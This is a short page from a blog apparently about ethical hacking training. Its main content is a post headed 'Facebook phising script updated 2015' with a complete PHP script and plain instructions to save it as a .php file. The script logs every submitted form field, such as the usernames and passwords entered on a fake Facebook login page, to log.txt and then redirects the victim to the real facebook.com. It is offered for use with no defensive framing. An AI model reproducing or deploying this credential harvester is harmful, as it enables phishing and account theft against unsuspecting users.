page content March 2014 ~ Ethical Hacking & CEH Training In Patna

ranjanraja.blogspot.in

My official blog

ranjanraja.blogspot.in

My official blog

ranjanraja.blogspot.in

My official blog

ranjanraja.blogspot.in

My official blog

ranjanraja.blogspot.in

My official blog

11.3.14

Facebook phising script updated 2015

Just copy the below script in notepad and save it as anyname.php

<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Twitter Delicious Facebook Digg Stumbleupon Favorites More